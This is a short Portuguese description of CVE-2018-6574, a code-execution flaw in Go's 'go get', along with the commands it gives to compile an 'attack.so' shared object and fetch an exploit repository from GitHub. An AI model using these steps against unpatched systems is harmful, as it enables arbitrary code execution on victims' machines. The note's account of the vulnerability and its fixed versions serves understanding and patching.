
CVE-2018-6574 esta vulnerabilidade afeta o comando go get do Golang e permite que um atacante obtenha execução de código em um sistema ao instalar uma biblioteca maliciosa; esta vulnerabilidade foi corrigida no Go 1.8.7, 1.9.4 e 1.10rc2. O Golang irá compilar extensões nativas.
gcc -shared -o attack.so -fPIC attack.c
go get github.com/zerbaliy3v/cve-2018-6574-exploit